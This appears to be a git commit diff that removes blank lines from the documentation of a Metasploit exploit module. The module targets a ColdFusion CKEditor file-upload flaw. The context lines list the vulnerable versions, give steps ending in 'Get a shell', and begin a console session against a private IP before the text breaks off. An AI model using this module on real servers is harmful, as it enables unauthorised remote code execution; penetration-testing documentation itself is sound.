Remove extra new lines
parent
33b8735d1c
commit
8ebbd9eeea
|
@ -12,7 +12,6 @@ ColdFusion 11 (Update 14 and earlier),
|
|||
ColdFusion 2016 (Update 6 and earlier), and
|
||||
[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. `./msfconsole -q`
|
||||
|
@ -22,13 +21,11 @@ ColdFusion 2016 (Update 6 and earlier), and
|
|||
5. `exploit`
|
||||
6. Get a shell
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Coldfusion 2018 v2018.0.0.310739
|
||||
|
||||
```
|
||||
|
||||
msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
|
||||
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
|
||||
rhosts => 172.22.222.142
|
||||
|
|
Loading…
Reference in New Issue